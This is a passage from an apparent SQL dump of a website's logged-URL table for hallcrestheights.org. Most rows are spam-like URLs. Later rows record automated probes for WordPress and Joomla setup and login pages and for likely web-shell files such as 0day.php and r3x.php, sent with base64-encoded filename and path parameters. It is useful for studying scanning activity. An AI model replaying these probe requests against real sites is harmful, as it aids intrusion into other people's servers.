00:00:00'),(4424,'http://www.hallcrestheights.org/qlbo-i20162629-k48205-wciggec-eayafxr-glnik-ghhmb-bxpgesm-rcai-ztbiauwd-tvixp/',NULL,'','',1,0,'2017-01-11 04:12:56','0000-00-00 00:00:00'),(4425,'http://www.hallcrestheights.org/tkuykfjd-k38341-njjb-ucyupaj-aylrlwfv-dyruqpkl-i20162633-sdef-hxdf-pdfuf-pfaj/',NULL,'','',1,0,'2017-01-11 04:16:43','0000-00-00 00:00:00'),(4426,'http://www.hallcrestheights.org/tkuykfjd-k59401-njjb-i20162630-ucyupaj-aylrlwfv-dyruqpkl-sdef-hxdf-pdfuf-pfaj/',NULL,'','',1,0,'2017-01-11 04:20:30','0000-00-00 00:00:00'),(4427,'http://www.hallcrestheights.org/cwhr-i20162629-k50005-iwgpekz-qdwkvum-zbsai-imjzf-ozgdvdd-qjvd-obknlykc-onedw/',NULL,'','',1,0,'2017-01-11 04:24:17','0000-00-00 00:00:00'),(4428,'http://www.hallcrestheights.org/qlbowcig-k58501-gece-i20162630-ayafxrg-lnikghhm-bbxpgesm-rcai-ztbi-auwdt-vixp/',NULL,'','',1,0,'2017-01-11 04:28:04','0000-00-00 00:00:00'),(4429,'http://www.hallcrestheights.org/soegszxy-k18541-ifet-vtndyuu-hvfcyzls-xxqroxae-i20162633-hksk-xyxe-mbuqu-dtwq/',NULL,'','',1,0,'2017-01-11 04:31:51','0000-00-00 00:00:00'),(4430,'http://www.hallcrestheights.org/yemb-i20162629-k50905-jvhtqqd-ckzfltz-terqb-wnswn-snjplpf-trrj-ncypjoqw-gzjev/',NULL,'','',1,0,'2017-01-11 04:35:38','0000-00-00 00:00:00'),(4431,'http://www.hallcrestheights.org/oiyi-i20162629-k48745-zgolrcm-wfbsnop-dgfnh-skrlj-rgfctfz-fiwx-wmakoayo-smpql/',NULL,'','',1,0,'2017-01-11 04:39:25','0000-00-00 00:00:00'),(4432,'http://www.hallcrestheights.org/yembjvht-k37801-qqdc-i20162630-kzfltzt-erqbwnsw-nsnjplpf-trrj-ncyp-joqwg-zjev/',NULL,'','',1,0,'2017-01-11 04:43:12','0000-00-00 00:00:00'),(4433,'http://www.hallcrestheights.org/htxwhykr-k59941-svsv-hudykbq-xdosfiet-i20162632-yuaixnrb-dggs-aarh-efskj-ydmr/',NULL,'','',1,0,'2017-01-11 04:50:46','0000-00-00 00:00:00'),(4434,'http://www.hallcrestheights.org/xhajvq-k50689-lwczbiqs-osqx-oqkgq-i20162632-aqyd-cptznzv-tjqoevp-caqwj-aluwty/',NULL,'','',1,0,'2017-01-11 04:54:33','0000-00-00 00:00:00'),(4435,'http://www.hallcrestheights.org/htxw-i20162629-k47305-hykrsvs-vhudykb-qxdos-fiety-uaixnrb-dggs-aarhefsk-jydmr/',NULL,'','',1,0,'2017-01-11 04:58:20','0000-00-00 00:00:00'),(4436,'http://www.hallcrestheights.org/tkuy-i20162629-k49105-kfjdnjj-bucyupa-jaylr-lwfvd-yruqpkl-sdef-hxdfpdfu-fpfaj/',NULL,'','',1,0,'2017-01-11 05:02:08','0000-00-00 00:00:00'),(4437,'http://www.hallcrestheights.org/wbwpbon-k36253-kydhx-i20162630-jjikvf-vtzpxb-xkcwj-ybty-lwosdu-ieqgws-ogxhgpi/',NULL,'','',1,0,'2017-01-11 05:05:54','0000-00-00 00:00:00'),(4438,'http://www.hallcrestheights.org/mrcqg-beif/i20162632-uwgr-abtnwyrq-k42334-semgwkow.htm',NULL,'','',2,0,'2017-01-11 05:09:29','0000-00-00 00:00:00'),(4439,'http://www.hallcrestheights.org/ajqxxuc-k56953-uzaof-i20162630-ifephi-ijimjn-jbogt-sakb-ccgyfm-dvjuxz-lektsls/',NULL,'','',1,0,'2017-01-11 05:09:43','0000-00-00 00:00:00'),(4440,'http://www.hallcrestheights.org/cwhr-i20162629-k26605-iwgpekz-qdwkvum-zbsai-imjzf-ozgdvdd-qjvd-obknlykc-onedw/',NULL,'','',1,0,'2017-01-11 05:13:28','0000-00-00 00:00:00'),(4441,'http://www.hallcrestheights.org/soegszx-k57853-yifet-i20162630-vtndyu-uhvfcy-zlsxx-qrox-aehksk-xyxemb-uqudtwq/',NULL,'','',1,0,'2017-01-11 05:21:03','0000-00-00 00:00:00'),(4442,'http://www.hallcrestheights.org/htxwhyk-k24373-rsvsv-i20162630-hudykb-qxdosf-ietyu-aixn-rbdggs-aarhef-skjydmr/',NULL,'','',1,0,'2017-01-11 05:28:36','0000-00-00 00:00:00'),(4443,'http://www.hallcrestheights.org/yembjvht-k40141-qqdc-kzfltzt-erqbwnsw-nsnjplpf-i20162633-trrj-ncyp-joqwg-zjev/',NULL,'','',1,0,'2017-01-11 05:32:23','0000-00-00 00:00:00'),(4444,'http://www.hallcrestheights.org/soegs-k757-zxyife-tvtnd-yuuh-vfcyzls-xxqroxae-hkskxyxe-i20162635-mbuqudt-wqceyvuc/',NULL,'','',1,0,'2017-01-11 05:36:10','0000-00-00 00:00:00'),(4445,'http://www.hallcrestheights.org/ajqxxuc-i20162631-uzaof-ifephi-k8853-ijimjn-jbogt-sakb-ccgyfm-dvjuxz-lektsls-hxosq/',NULL,'','',1,0,'2017-01-11 05:39:57','0000-00-00 00:00:00'),(4446,'http://www.hallcrestheights.org/qlbowc-iggeceay-i20162632-afxr-glnik-ghhm-bbxpges-mrcaizt-biauw-dtvixp-k29589-mtzh/',NULL,'','',1,0,'2017-01-11 05:43:44','0000-00-00 00:00:00'),(4447,'http://www.hallcrestheights.org/yembjvh-i20162631-tqqdc-kzfltz-k7953-terqbw-nswns-njpl-pftrrj-ncypjo-qwgzjev-ihsdp/',NULL,'','',1,0,'2017-01-11 05:51:18','0000-00-00 00:00:00'),(4448,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb-qxdos-fiet-yuaixnr-bdggsaa-rhefs-kjydmr-i20162629-k14649-ujwi/',NULL,'','',1,0,'2017-01-11 05:55:05','0000-00-00 00:00:00'),(4449,'http://www.hallcrestheights.org/bsoapa-zapstasg-i20162632-mhcq-cmckf-rdtf-kgpvbch-siwhork-lvzrt-jrsyoa-k50289-ayfw/',NULL,'','',1,0,'2017-01-11 05:58:52','0000-00-00 00:00:00'),(4450,'http://www.hallcrestheights.org/xhaj-vqlwczb-iqsosqx-oqkgq-aqydc-k8205-ptznzvt-jqoe-vpcaqwja-luwty-i20162629-bckbsx/',NULL,'','',1,0,'2017-01-11 06:02:39','0000-00-00 00:00:00'),(4451,'http://www.hallcrestheights.org/i20162630-ajqx-xucuzao-fifephi-ijimj-njbog-k6045-tsakbcc-gyfm-dvjuxzle-ktsls-hxosqq/',NULL,'','',1,0,'2017-01-11 06:06:26','0000-00-00 00:00:00'),(4452,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-cmckf-rdtfk-k9105-gpvbchs-iwho-rklvzrtj-rsyoa-i20162629-ayfwgd/',NULL,'','',1,0,'2017-01-11 06:10:13','0000-00-00 00:00:00'),(4453,'http://www.hallcrestheights.org/i20162630-tkuykfj-dnjjb-ucyupa-k24873-jaylrl-wfvdy-ruqp-klsdef-hxdfpd-fufpfaj-npvza/',NULL,'','',1,0,'2017-01-11 06:14:00','0000-00-00 00:00:00'),(4454,'http://www.hallcrestheights.org/i20162630-wbwpbon-kydhx-jjikvf-k58353-vtzpxb-xkcwj-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn/',NULL,'','',1,0,'2017-01-11 06:17:47','0000-00-00 00:00:00'),(4455,'http://www.hallcrestheights.org/yembj-k22357-vhtqqd-ckzfl-tzte-rqbwnsw-nsnjplpf-trrjncyp-i20162635-joqwgzj-evihsdpa/',NULL,'','',1,0,'2017-01-11 06:21:35','0000-00-00 00:00:00'),(4456,'http://www.hallcrestheights.org/i20162630-xhajvql-wczbi-qsosqx-k36753-oqkgqa-qydcp-tznz-vtjqoe-vpcaqw-jaluwty-bckbs/',NULL,'','',2,0,'2017-01-11 06:25:21','0000-00-00 00:00:00'),(4457,'http://www.hallcrestheights.org/kzpf-fmsxklr-dedhwge-fvbbg-zagpe-k7305-ciyyuwu-vfzt-jigjinam-zbcng-i20162629-tfmlyr/',NULL,'','',1,0,'2017-01-11 06:29:07','0000-00-00 00:00:00'),(4458,'http://www.hallcrestheights.org/i20162630-qlbowci-ggece-ayafxr-k23973-glnikg-hhmbb-xpge-smrcai-ztbiau-wdtvixp-mtzhz/',NULL,'','',1,0,'2017-01-11 06:36:42','0000-00-00 00:00:00'),(4459,'http://www.hallcrestheights.org/cwhri-k21457-wgpekz-qdwkv-umzb-saiimjz-fozgdvdd-qjvdobkn-i20162635-lykcone-dwjmaxev/',NULL,'','',1,0,'2017-01-11 06:40:29','0000-00-00 00:00:00'),(4460,'http://www.hallcrestheights.org/i20162630-nfrkopd-obbum-golzes-k57453-rkwtzq-tqbsv-jcwj-bxnmyv-sssldj-znaahjb-kwxro/',NULL,'','',1,0,'2017-01-11 06:44:16','0000-00-00 00:00:00'),(4461,'http://www.hallcrestheights.org/nfrk-opdobbu-mgolzes-rkwtz-qtqbs-k5505-vjcwjbx-nmyv-sssldjzn-aahjb-i20162629-kwxros/',NULL,'','',1,0,'2017-01-11 06:48:03','0000-00-00 00:00:00'),(4462,'http://www.hallcrestheights.org/i20162636-k52784-upttm-nbea-tgrb-nqcdcncx.htm',NULL,'https://www.google.co.jp/','',10,0,'2017-01-11 06:51:40','0000-00-00 00:00:00'),(4463,'http://www.hallcrestheights.org/tkuy-kfjdnjj-bucyupa-jaylr-lwfvd-k47805-yruqpkl-sdef-hxdfpdfu-fpfaj-i20162629-npvzat/',NULL,'','',1,0,'2017-01-11 06:55:37','0000-00-00 00:00:00'),(4464,'http://www.hallcrestheights.org/ajqx-xucuzao-fifephi-ijimj-njbog-k27105-tsakbcc-gyfm-dvjuxzle-ktsls-i20162629-hxosqq/',NULL,'','',1,0,'2017-01-11 06:59:24','0000-00-00 00:00:00'),(4465,'http://www.hallcrestheights.org/i20162630-cwhr-iwgpekz-qdwkvum-zbsai-imjzf-k27645-ozgdvdd-qjvd-obknlykc-onedw-jmaxev/',NULL,'','',2,0,'2017-01-11 07:03:11','0000-00-00 00:00:00'),(4466,'http://www.hallcrestheights.org/qlbo-wciggec-eayafxr-glnik-ghhmb-k49245-bxpgesm-rcai-ztbiauwd-tvixp-i20162629-mtzhzz/',NULL,'','',1,0,'2017-01-11 07:06:59','0000-00-00 00:00:00'),(4467,'http://www.hallcrestheights.org/yemb-jvhtqqd-ckzfltz-terqb-wnswn-k49605-snjplpf-trrj-ncypjoqw-gzjev-i20162629-ihsdpa/',NULL,'','',1,0,'2017-01-11 07:10:45','0000-00-00 00:00:00'),(4468,'http://www.hallcrestheights.org/htxw-hykrsvs-vhudykb-qxdos-fiety-k48345-uaixnrb-dggs-aarhefsk-jydmr-i20162629-ujwimj/',NULL,'','',1,0,'2017-01-11 07:14:32','0000-00-00 00:00:00'),(4469,'http://www.hallcrestheights.org/yemb-jvhtqqd-ckzfltz-terqb-wnswn-k26205-snjplpf-trrj-ncypjoqw-gzjev-i20162629-ihsdpa/',NULL,'','',1,0,'2017-01-11 07:18:19','0000-00-00 00:00:00'),(4470,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf-vtzpx-bxkcw-k29805-jybtylw-osdu-ieqgwsog-xhgpi-i20162629-sdhtni/',NULL,'','',1,0,'2017-01-11 07:22:07','0000-00-00 00:00:00'),(4471,'http://www.hallcrestheights.org/ajqx-xucuzao-fifephi-ijimj-njbog-k50505-tsakbcc-gyfm-dvjuxzle-ktsls-i20162629-hxosqq/',NULL,'','',1,0,'2017-01-11 07:25:53','0000-00-00 00:00:00'),(4472,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu-uhvfc-yzlsx-k28005-xqroxae-hksk-xyxembuq-udtwq-i20162629-ceyvuc/',NULL,'','',1,0,'2017-01-11 07:29:40','0000-00-00 00:00:00'),(4473,'http://www.hallcrestheights.org/nfrkopdo-k18141-bbum-golzesr-i20162633-kwtzqtqb-svjcwjbx-nmyv-sssl-djzna-ahjb-kwxrosh/',NULL,'','',1,0,'2017-01-11 07:33:27','0000-00-00 00:00:00'),(4474,'http://www.hallcrestheights.org/i20162630-soegszxy-k38301-ifet-vtndyuu-hvfcyzls-xxqroxae-hksk-xyxe-mbuqu-dtwq-ceyvuci/',NULL,'','',1,0,'2017-01-11 07:37:18','0000-00-00 00:00:00'),(4475,'http://www.hallcrestheights.org/yembjvht-k38841-qqdc-kzfltzt-i20162633-erqbwnsw-nsnjplpf-trrj-ncyp-joqwg-zjev-ihsdpac/',NULL,'','',1,0,'2017-01-11 07:41:02','0000-00-00 00:00:00'),(4476,'http://www.hallcrestheights.org/wbwpbonk-k19041-ydhx-jjikvfv-i20162633-tzpxbxkc-wjybtylw-osdu-ieqg-wsogx-hgpi-sdhtnir/',NULL,'','',1,0,'2017-01-11 07:44:48','0000-00-00 00:00:00'),(4477,'http://www.hallcrestheights.org/i20162630-cwhriwgp-k59001-ekzq-dwkvumz-bsaiimjz-fozgdvdd-qjvd-obkn-lykco-nedw-jmaxevo/',NULL,'','',1,0,'2017-01-11 07:48:35','0000-00-00 00:00:00'),(4478,'http://www.hallcrestheights.org/qlbowcig-k59541-gece-i20162632-ayafxrg-lnikghhm-bbxpgesm-rcai-ztbi-auwdt-vixp-mtzhzzw/',NULL,'','',1,0,'2017-01-11 07:52:22','0000-00-00 00:00:00'),(4479,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-vtzpxb-xkcwj-i20162631-ybty-lwosdu-ieqgws-k7653-ogxhgpi-sdhtn-irmjh/',NULL,'','',1,0,'2017-01-11 07:56:09','0000-00-00 00:00:00'),(4480,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge-fvbbgz-agpec-i20162631-iyyu-k8553-wuvfzt-jigjin-amzbcng-tfmly-rghdf/',NULL,'','',1,0,'2017-01-11 07:59:56','0000-00-00 00:00:00'),(4481,'http://www.hallcrestheights.org/k6105-oiyi-zgolrcm-wfbsnop-i20162629-dgfnh-skrlj-rgfctfz-fiwx-wmakoayo-smpql-gvegdf-vgcrc/',NULL,'','',1,0,'2017-01-11 08:03:43','0000-00-00 00:00:00'),(4482,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-uhvfcy-i20162630-zlsxx-qrox-aehksk-xyxemb-uqudtwq-ceyvu-k24573-ciwqw/',NULL,'','',1,0,'2017-01-11 08:07:30','0000-00-00 00:00:00'),(4483,'http://www.hallcrestheights.org/oiyizgo-lrcmw-fbsnop-dgfnhs-i20162630-krljr-gfct-k58053-fzfiwx-wmakoa-yosmpql-gvegd-fvgcr/',NULL,'','',1,0,'2017-01-11 08:11:21','0000-00-00 00:00:00'),(4484,'http://www.hallcrestheights.org/tkuy-kfjdnjj-bucyupa-i20162629-jaylr-lwfvd-k8805-yruqpkl-sdef-hxdfpdfu-fpfaj-npvzat-tuxdw/',NULL,'','',1,0,'2017-01-11 08:15:04','0000-00-00 00:00:00'),(4485,'http://www.hallcrestheights.org/nfrkop-dobbumgo/lzes-rkwtz-qtqb-i20162633-k8339-svjcwjb/',NULL,'','',1,0,'2017-01-11 12:46:39','0000-00-00 00:00:00'),(4486,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq-i20162629-cmckf/k14799-rdtf-kgpvbch-siwhork-lvzrt-jrsyoa-ayfw-gdxskmyu/',NULL,'','',1,0,'2017-01-11 16:58:43','0000-00-00 00:00:00'),(4487,'http://www.hallcrestheights.org/i20162628-ryvhrhmq-tyysl/k19490-lgeajanp-dmefnxh-qfhj-dyhao.htm',NULL,'','',2,0,'2017-01-11 17:44:09','0000-00-00 00:00:00'),(4488,'http://www.hallcrestheights.org/ajqxx-i20162635-ucuzao-fifep-hiij-imjnjbo-k1157-gtsakbcc/',NULL,'','',7,0,'2017-01-11 17:53:07','0000-00-00 00:00:00'),(4489,'http://www.hallcrestheights.org/ryvhrhmq-k15850-tyysl-lgeajanp-dmefnxh/qfhj-dyhao-xrcjhw-i20162635-uvds-vezytwlc.htm',NULL,'','',2,0,'2017-01-11 18:40:05','0000-00-00 00:00:00'),(4490,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-uhvfc/i20162632-yzls-xxqroxa-ehkskxy-xembu-qudtwq-ceyv-uciwqwsg-k50339-frvrjods/',NULL,'','',1,0,'2017-01-11 19:08:54','0000-00-00 00:00:00'),(4491,'http://www.hallcrestheights.org/i20162637-mrcqgbei-fuwgr-abtnwyrq-k60690-semgwko/whme-mxgku-cybnpz-kicv-ejxkulzj-cjkntsxj-lnuuuv.htm',NULL,'','',1,0,'2017-01-11 19:27:53','0000-00-00 00:00:00'),(4492,'http://www.hallcrestheights.org/edzv-dlqcomn-k21062-nmmca-wvbfuj/apyvrlf-lxhqjkuh-i20162634-kcmumbh-mgznkohe-yrup-xpudzikm-ussheqnr-fwnplxy.htm',NULL,'','',1,0,'2017-01-11 19:28:46','0000-00-00 00:00:00'),(4493,'http://www.hallcrestheights.org/edzvd-lqco/i20162636-k22154-mnnm-mcawvbfu-japyvrlf-lxhqjk.htm',NULL,'','',1,0,'2017-01-11 20:36:09','0000-00-00 00:00:00'),(4494,'http://hallcrestheights.org/blog/wp-admin/setup-config.php',NULL,'','',6,0,'2017-01-11 20:51:38','0000-00-00 00:00:00'),(4495,'http://hallcrestheights.org/wp/wp-admin/setup-config.php',NULL,'','',7,0,'2017-01-11 20:51:38','0000-00-00 00:00:00'),(4496,'http://hallcrestheights.org/wordpress/wp-admin/setup-config.php',NULL,'','',7,0,'2017-01-11 20:51:44','0000-00-00 00:00:00'),(4497,'http://www.hallcrestheights.org/vqjn-k21412-yspvhol-jpeur-rtpilu-ourxivl-btrhnnmt-i20162634-qzkowts-xppbgrrc-dsik.htm',NULL,'','',8,0,'2017-01-11 23:09:09','0000-00-00 00:00:00'),(4498,'http://www.hallcrestheights.org/yembj-i20162635-vhtqqd/ckzfl-tzte-rqbwnsw-k24827-nsnjplpf/',NULL,'','',1,0,'2017-01-11 23:32:38','0000-00-00 00:00:00'),(4499,'http://www.hallcrestheights.org/pcscqruf-k16050-unpkw-xpoideot-wtvsoar/mosm-gepla-lheliy-rqiy-qfufxvug-i20162635-owopegtq-amzimc.htm',NULL,'','',1,0,'2017-01-12 00:03:53','0000-00-00 00:00:00'),(4500,'http://www.hallcrestheights.org//images/logo_img.php',NULL,'','',2,0,'2017-01-12 00:19:10','0000-00-00 00:00:00'),(4501,'http://www.hallcrestheights.org/pages/school-01.html',NULL,'','',10,0,'2017-01-12 02:12:20','0000-00-00 00:00:00'),(4502,'http://www.hallcrestheights.org/hh-cavalier-floor-plan.pdf',NULL,'','',53,0,'2017-01-12 06:36:42','0000-00-00 00:00:00'),(4503,'http://hallcrestheights.org//libraries/joomla/juser.php?u',NULL,'','',1,0,'2017-01-12 10:49:30','0000-00-00 00:00:00'),(4504,'http://hallcrestheights.org/wp-login.php',NULL,'','',118,0,'2017-01-12 10:51:48','0000-00-00 00:00:00'),(4505,'http://hallcrestheights.org//wp-login.php',NULL,'','',12,0,'2017-01-12 10:51:48','0000-00-00 00:00:00'),(4506,'http://www.hallcrestheights.org/fadl-ajfnlgf/i20162634-k962-pcvwg-myhdec.htm',NULL,'','',1,0,'2017-01-12 11:36:52','0000-00-00 00:00:00'),(4507,'http://www.hallcrestheights.org/lugdl-i20162633-trsm/k1034-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-12 12:10:55','0000-00-00 00:00:00'),(4508,'http://www.hallcrestheights.org/vqjnyspv-holjp/k4850-eurrtpil-i20162635-uourxiv.htm',NULL,'','',1,0,'2017-01-12 13:41:42','0000-00-00 00:00:00'),(4509,'http://www.hallcrestheights.org/jgletkym-i20162637-drqzn/k61190-rvmlkswa-zvkecqq.htm',NULL,'','',1,0,'2017-01-12 14:30:53','0000-00-00 00:00:00'),(4510,'http://www.hallcrestheights.org/gnfznxv-i20162633-jxpaltit/k278-jshkyjyl-dpijaam.htm',NULL,'','',1,0,'2017-01-12 14:42:15','0000-00-00 00:00:00'),(4511,'http://www.hallcrestheights.org/i20162632-upttmnbe-atgrb/k36170-nqcdcncx-rdhcpgz.htm',NULL,'','',1,0,'2017-01-12 14:53:36','0000-00-00 00:00:00'),(4512,'http://www.hallcrestheights.org/i20162632-fadlajfn-lgfpc/k15470-vwgmyhde-cwxbdeu.htm',NULL,'','',1,0,'2017-01-12 15:27:40','0000-00-00 00:00:00'),(4513,'http://hallcrestheights.org/hh-bradford2-floor-plan.pdf',NULL,'','',52,0,'2017-01-12 17:38:44','0000-00-00 00:00:00'),(4514,'http://www.hallcrestheights.org/k36070-pcscqruf-unpkw/i20162632-xpoideot-wtvsoar-mosm.htm',NULL,'','',1,0,'2017-01-12 19:29:47','0000-00-00 00:00:00'),(4515,'http://www.hallcrestheights.org/k15370-upttmnbe-atgrb/i20162632-nqcdcncx-rdhcpgz-zdll.htm',NULL,'','',1,0,'2017-01-12 20:11:24','0000-00-00 00:00:00'),(4516,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc/yupa-jaylr-i20162632-lwfv-k50639-dyruqpk/',NULL,'','',1,0,'2017-01-12 20:12:27','0000-00-00 00:00:00'),(4517,'http://hallcrestheights.org//images/xxu.php',NULL,'','',26,0,'2017-01-12 20:25:44','0000-00-00 00:00:00'),(4518,'http://hallcrestheights.org//x.php',NULL,'','',26,0,'2017-01-12 20:25:45','0000-00-00 00:00:00'),(4519,'http://hallcrestheights.org//images/1ndex.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:25:49','0000-00-00 00:00:00'),(4520,'http://hallcrestheights.org//sqlbak.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:25:55','0000-00-00 00:00:00'),(4521,'http://hallcrestheights.org//email.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:25:59','0000-00-00 00:00:00'),(4522,'http://hallcrestheights.org//functions.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:26:02','0000-00-00 00:00:00'),(4523,'http://hallcrestheights.org//cache/news.php?z3=azRBa1ltLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:26:07','0000-00-00 00:00:00'),(4524,'http://hallcrestheights.org//tmp.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-01-12 20:26:14','0000-00-00 00:00:00'),(4525,'http://hallcrestheights.org//shootme.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:26:30','0000-00-00 00:00:00'),(4526,'http://hallcrestheights.org//configurationbak.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:26:34','0000-00-00 00:00:00'),(4527,'http://hallcrestheights.org//robots.txt.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:26:39','0000-00-00 00:00:00'),(4528,'http://hallcrestheights.org//jconfig.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:26:44','0000-00-00 00:00:00'),(4529,'http://hallcrestheights.org//media/reads.php?z3=azRBa1ltLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:26:56','0000-00-00 00:00:00'),(4530,'http://hallcrestheights.org//media/1ndex.php?z3=azRBa1ltLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:03','0000-00-00 00:00:00'),(4531,'http://hallcrestheights.org//sql_dump.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:09','0000-00-00 00:00:00'),(4532,'http://hallcrestheights.org//images/laj.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:12','0000-00-00 00:00:00'),(4533,'http://hallcrestheights.org//media/404.php?z3=azRBa1ltLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:26','0000-00-00 00:00:00'),(4534,'http://hallcrestheights.org//media/tmp.php?z3=azRBa1ltLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:29','0000-00-00 00:00:00'),(4535,'http://hallcrestheights.org//r3x.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:34','0000-00-00 00:00:00'),(4536,'http://hallcrestheights.org//log.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:39','0000-00-00 00:00:00'),(4537,'http://hallcrestheights.org//images/stories/0day.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:44','0000-00-00 00:00:00'),(4538,'http://hallcrestheights.org//includes/u2p.php?z3=azRBa1ltLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:49','0000-00-00 00:00:00'),(4539,'http://hallcrestheights.org//images/xxx.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:51','0000-00-00 00:00:00'),(4540,'http://hallcrestheights.org//al277.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:27:55','0000-00-00 00:00:00'),(4541,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=azRBa1ltLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:01','0000-00-00 00:00:00'),(4542,'http://hallcrestheights.org//install.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:05','0000-00-00 00:00:00'),(4543,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=azRBa1ltLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:08','0000-00-00 00:00:00'),(4544,'http://hallcrestheights.org//robot.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:16','0000-00-00 00:00:00'),(4545,'http://hallcrestheights.org//wsdl.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:23','0000-00-00 00:00:00'),(4546,'http://hallcrestheights.org//goog1es.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:26','0000-00-00 00:00:00'),(4547,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=azRBa1ltLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:32','0000-00-00 00:00:00'),(4548,'http://hallcrestheights.org//update.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:36','0000-00-00 00:00:00'),(4549,'http://hallcrestheights.org//includes.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:42','0000-00-00 00:00:00'),(4550,'http://hallcrestheights.org//wp-main.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:47','0000-00-00 00:00:00'),(4551,'http://hallcrestheights.org//news.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:53','0000-00-00 00:00:00'),(4552,'http://hallcrestheights.org//images/al277.php?z3=azRBa1ltLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:28:56','0000-00-00 00:00:00'),(4553,'http://hallcrestheights.org//webconfig.txt.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:00','0000-00-00 00:00:00'),(4554,'http://hallcrestheights.org//cache/cachee.php?z3=azRBa1ltLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:05','0000-00-00 00:00:00'),(4555,'http://hallcrestheights.org//thumb.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:09','0000-00-00 00:00:00'),(4556,'http://hallcrestheights.org//SessionController.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:17','0000-00-00 00:00:00'),(4557,'http://hallcrestheights.org//maill.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:21','0000-00-00 00:00:00'),(4558,'http://hallcrestheights.org//error-log.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:28','0000-00-00 00:00:00'),(4559,'http://hallcrestheights.org//authenticating.php?z3=azRBa1ltLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-12 20:29:31','0000-00-00 